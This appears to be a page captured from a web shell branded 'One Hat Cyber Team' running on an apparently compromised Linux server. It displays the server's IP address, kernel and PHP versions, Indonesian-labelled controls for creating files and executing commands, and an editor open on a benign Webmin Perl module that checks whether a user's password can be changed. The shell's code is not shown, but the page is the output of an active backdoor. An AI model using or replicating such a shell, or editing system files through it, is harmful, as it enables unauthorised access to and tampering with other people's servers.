⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.93
Server IP:
65.108.141.171
Server:
Linux server.heloix.com 5.4.0-214-generic #234-Ubuntu SMP Fri Mar 14 23:50:27 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
webmin
/
change-user
/
Edit File: change-user-lib.pl
=head1 change-user-lib.pl This module has no actual functionality of it's own, so there isn't much to say here. =cut BEGIN { push(@INC, ".."); }; use strict; use warnings; no warnings 'redefine'; no warnings 'uninitialized'; use WebminCore; &init_config(); &foreign_require("acl", "acl-lib.pl"); &foreign_require("webmin", "webmin-lib.pl"); our %access = &get_module_acl(); =head2 can_change_pass(&user) Returns 1 if some user's password can be changed. =cut sub can_change_pass { my ($user) = @_; return $user->{'pass'} ne 'x' && $user->{'pass'} ne 'e' && !$user->{'sync'} && $user->{'pass'} ne "*LK*"; }
Simpan